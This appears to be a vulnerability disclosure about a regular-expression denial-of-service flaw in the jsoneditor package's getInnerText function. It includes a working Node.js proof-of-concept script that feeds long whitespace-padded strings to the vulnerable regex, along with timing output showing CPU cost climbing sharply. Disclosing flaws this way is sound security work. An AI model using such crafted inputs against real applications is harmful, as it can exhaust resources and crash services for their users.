The jsoneditor
package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide a crafted element as input to the getInnerText function may cause an application to consume an excessive amount of CPU.
Below pinned line using vulnerable regex.
Reproducer where we’ve copied the relevant code:
Put the below in a poc.js file and run with node
var regex = /\s*\n\s*/g;
for(var i = 1; i <= 500; i++) {
var time = Date.now();
var payload = "A"+" ".repeat(i*10000)+"Z"
regex.test(payload)
var time_cost = Date.now() - time;
console.log("Trim time : " + payload.length + ": " + time_cost+" ms");
}
Check the Output:
Trim time : 10002: 102 ms
Trim time : 20002: 421 ms
Trim time : 30002: 927 ms
Trim time : 40002: 1693 ms
Trim time : 50002: 2659 ms
Trim time : 60002: 3945 ms
Trim time : 70002: 5472 ms
Trim time : 80002: 7407 ms
Trim time : 90002: 8342 ms
Trim time : 100002: 10267 ms
Trim time : 110002: 13306 ms
--
--
This vulnerability is capable of exhausting system resources and leads to crashes.